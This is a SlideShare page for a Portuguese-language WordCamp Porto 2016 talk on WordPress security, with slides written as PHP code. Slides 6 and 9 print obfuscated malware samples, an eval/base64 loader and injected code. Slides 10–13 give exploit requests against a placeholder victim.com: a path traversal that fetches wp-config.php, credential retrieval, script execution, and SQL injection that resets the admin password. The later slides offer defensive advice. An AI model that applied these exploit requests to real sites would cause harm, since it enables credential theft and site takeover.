Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
$talk =“Segurança_e_mobilidade”; $where = date_default_timezone_set(‘Europe/Porto'); $date = '2016-05-14 12:00:00’; start(...
/* Apresentação */ $who =“Marcel Schmitz”; $role =“CTO + web & mobile developer”; $where =“hellodev.us”; $email =“marcel@h...
/* Apresentação */
/* Primeiros contactos com sites comprometidos */ -rw-r--r-- 1 root root 3012 May 11 09:59 index.php /* Source: Wordfence ...
/* Primeiros contactos com sites comprometidos */ <?php // Silence is golden.
/* Primeiros contactos com sites comprometidos */ <?php // Silence is golden. $x =“NFbkn veorgASDgaskdhfkashdfpwehibvasipd...
/* Como uma instalação de WordPress pode ser comprometida */ // RESPONSIBLE FOR 70% OF THE ATTACKS
 $first =“plugin”; $seco...
/* O que fazem depois? */ // MOST OF THEM
 $first_choice =“deface or take offline”; $second_choice =“send spam”; $third_choic...
/* Site comprometido por um plugin */ // MOST COMMON METHOD $using_method =“Local File Inclusion (LFI) attack.”; // EXAMPL...
/* Site comprometido por um plugin */ // EXAMPLE - DOWNLOAD WP-CONFIG.PHP FILE - REVSLIDER $wpconfig_content = file_get_cont...
/* Site comprometido por um plugin */ // EXAMPLE - PHPINFO WITH CONSTANTS OR DOWNLOADING BACKUPS OR UPLOADING FILES $nonce...
/* Site comprometido por um plugin */ // EXAMPLE - EXECUTING SCRIPTS $script_to_execute =“phpinfo()”;
 $content_of_phpinfo...
/* Site comprometido por um plugin */ // EXAMPLE - DATABASE INJECTION (MISSING ASCII TO HTML CODE CONVERSION) $context = …...
/* Site comprometido por um plugin */ // HOW TO PROTECT AGAINST ATTACKS THROUGH PLUGINS? $simple_solution =“update, update...
/* Site comprometido por brute force */ // PASSWORD GUESSING ATTACK $tips = array(“dont user obvious usernames”,“dont use ...
/* Site comprometido por outros motivos */ // SET THE CORRECT PERMISSIONS $folders =“0755”; $files =“0644”; $wp_config =“044...
/* Site comprometido por outros motivos */ // SET THE CORRECT .HTACCESS CONTENT $things_you_can_do = array(“block IPs”,“pr...
/* Site comprometido por outros motivos */ // HAVE LATEST OS UPDATES INSTALLED if ($i_have_a_server() == true) { update_os...
/* Atualizar, sempre! */ // UPDATE PLUGINS, UPDATE CORE INSTALATION, UPDATE THEMES $always_update = true;
/* Plugins que ajudam */ // SECURITY PLUGINS
 install_plugin_by_slug(‘wordfence’); install_plugin_by_slug(‘sucuri-scanner’...
/* A nossa solução, aberta para todos */ // OUR PROBLEMS, YOUR PROBLEMS, SHARING A SOLUTION $new_approach = install_hellos...
// MOBILE APP $name =“HELLOSYS”
/* A nossa solução, aberta para todos */ // ENTER BETA, STAY TUNED $url =“http://hellodev.us”;
$talk =“Segurança_e_mobilidade”; $where = date_default_timezone_set(‘Europe/Porto'); $date = '2016-05-14 12:20:00’; thank_...
Security and Mobility - WordCamp Porto 2016
Security and Mobility - WordCamp Porto 2016
Security and Mobility - WordCamp Porto 2016
Upcoming SlideShare
Loading in …5
×

Security and Mobility - WordCamp Porto 2016

210 views

Published on

Slides from my talk @ aWordCamp Portugal 2016 about hellodev's experience concerning self-hosted WordPress websites and all the security issues around it. Tips and other useful information inside.

Published in: Technology
no profile picture user

  • Be the first to comment

  • Be the first to like this

Security and Mobility - WordCamp Porto 2016

  1. 1. $talk =“Segurança_e_mobilidade”; $where = date_default_timezone_set(‘Europe/Porto'); $date = '2016-05-14 12:00:00’; start(); /* Início */
  2. 2. /* Apresentação */ $who =“Marcel Schmitz”; $role =“CTO + web & mobile developer”; $where =“hellodev.us”; $email =“marcel@hellodev.us”;
  3. 3. /* Apresentação */
  4. 4. /* Primeiros contactos com sites comprometidos */ -rw-r--r-- 1 root root 3012 May 11 09:59 index.php /* Source: Wordfence March 2016 */
  5. 5. /* Primeiros contactos com sites comprometidos */ <?php // Silence is golden.
  6. 6. /* Primeiros contactos com sites comprometidos */ <?php // Silence is golden. $x =“NFbkn veorgASDgaskdhfkashdfpwehibvasipdhvaipegaiweHFAPEIgaPIyeiaaipwehgwEG $34h293gHW)EHG(QHgQ(WEGH#$)GhQªGH)EHGQ3223nfk2n3f23nçkfn2ç34”;
 $r=eval(gzinflate(str_rot13(base64_decode($x))));
  7. 7. /* Como uma instalação de WordPress pode ser comprometida */ // RESPONSIBLE FOR 70% OF THE ATTACKS
 $first =“plugin”; $second =“brute force”; // OTHER 30% $other = array(“code”, ”theme”, ”hosting”, ”file permissions”); /* Source: Wordfence March 2016 */
  8. 8. /* O que fazem depois? */ // MOST OF THEM
 $first_choice =“deface or take offline”; $second_choice =“send spam”; $third_choice =“seo spam”; $other =“redirect”; /* Source: Wordfence March 2016 */
  9. 9. /* Site comprometido por um plugin */ // MOST COMMON METHOD $using_method =“Local File Inclusion (LFI) attack.”; // EXAMPLE - INJECTED CODE <?php ${“Gx4cOx42x41x4cx53"}["x69wirx72x63x66x76"]="x69";${"x47Lx4fx42ALx53"} ["x61rx6bmx64z"]="mx6bx41x72r";${"x47x4cOx42x41x4cS"}["ex6ax71x68x68j x6c"]="x6dx6bx5ftx65x6dp";${"GLOx42x41x4cx53"}["x72x66lx73x65x76x68m x67x68x79"]="x73tx72x69x70Ax72x72";${"Gx4cx4fx42x41x4cx53"}["v x72x72x71x78x6dx6dx77y"]="x63ax74x5fcross";${"x47x4cx4fx42ALx53"} ["x72x73x77x70x61x6cx78tx62x79n"]="tex6dx70lx61te";${"GLx4fx42Ax4cx53"}["g x78x67ycx74x71x73"]="tx69tlx65"; ?>
  10. 10. /* Site comprometido por um plugin */ // EXAMPLE - DOWNLOAD WP-CONFIG.PHP FILE - REVSLIDER $wpconfig_content = file_get_contents(“http://victim.com/wp-admin/admin- ajax.php?action=revslider_show_image&img=../wp-config.php”); /* Source: http://finalphoenix.me/ */
  11. 11. /* Site comprometido por um plugin */ // EXAMPLE - PHPINFO WITH CONSTANTS OR DOWNLOADING BACKUPS OR UPLOADING FILES $nonce = file_get_contents(“http://victim.com/wp-admin/admin.php? action=upgrade-plugin”);
 $credentials = file_get_contents(“http://victim.com/wp-admin/admin.php? action=updraft_ajax_handler&nonce=$nonce”); /* Source: http://finalphoenix.me/ */
  12. 12. /* Site comprometido por um plugin */ // EXAMPLE - EXECUTING SCRIPTS $script_to_execute =“phpinfo()”;
 $content_of_phpinfo = file_get_contents(“http://victim.com/wp-admin/ admin-post.php?action=wp_ajax_easymedia_imgresize_ajax?imgurl= $script_to_execute”); /* Source: http://finalphoenix.me/ */
  13. 13. /* Site comprometido por um plugin */ // EXAMPLE - DATABASE INJECTION (MISSING ASCII TO HTML CODE CONVERSION) $context = … $query_to_inject =“update wp_users set password=md5(‘123’) where id=1”;
 $chage_password = file_get_contents(“http://victim.com/wp-admin/admin.php? page=aiowpsec&tab=tab1&orderby=$query_to_inject”, false, $context); /* Source: http://finalphoenix.me/ */
  14. 14. /* Site comprometido por um plugin */ // HOW TO PROTECT AGAINST ATTACKS THROUGH PLUGINS? $simple_solution =“update, update, update!”; $other_tips = array (“dont use old plugins”,“search for news about security issues”,“take a look at the code”);
  15. 15. /* Site comprometido por brute force */ // PASSWORD GUESSING ATTACK $tips = array(“dont user obvious usernames”,“dont use simple passwords”,“create a new admin account”);
 $how_to_avoid =“two factor authentication”; $other_solution = array(“change /wp-admin”,“blacklist IPs trying to login and failing for more than x times”);
  16. 16. /* Site comprometido por outros motivos */ // SET THE CORRECT PERMISSIONS $folders =“0755”; $files =“0644”; $wp_config =“0444”; $htaccess =“0444”;
  17. 17. /* Site comprometido por outros motivos */ // SET THE CORRECT .HTACCESS CONTENT $things_you_can_do = array(“block IPs”,“protect files”,“allow certain file extensions from wp_content/*”);
  18. 18. /* Site comprometido por outros motivos */ // HAVE LATEST OS UPDATES INSTALLED if ($i_have_a_server() == true) { update_os(); }
  19. 19. /* Atualizar, sempre! */ // UPDATE PLUGINS, UPDATE CORE INSTALATION, UPDATE THEMES $always_update = true;
  20. 20. /* Plugins que ajudam */ // SECURITY PLUGINS
 install_plugin_by_slug(‘wordfence’); install_plugin_by_slug(‘sucuri-scanner’); install_plugin_by_slug(‘better-wp-security’); // iThemes Security install_plugin_by_slug(‘google-authenticator’);
  21. 21. /* A nossa solução, aberta para todos */ // OUR PROBLEMS, YOUR PROBLEMS, SHARING A SOLUTION $new_approach = install_hellosys();
  22. 22. // MOBILE APP $name =“HELLOSYS”
  23. 23. /* A nossa solução, aberta para todos */ // ENTER BETA, STAY TUNED $url =“http://hellodev.us”;
  24. 24. $talk =“Segurança_e_mobilidade”; $where = date_default_timezone_set(‘Europe/Porto'); $date = '2016-05-14 12:20:00’; thank_you(); /* Fim */

×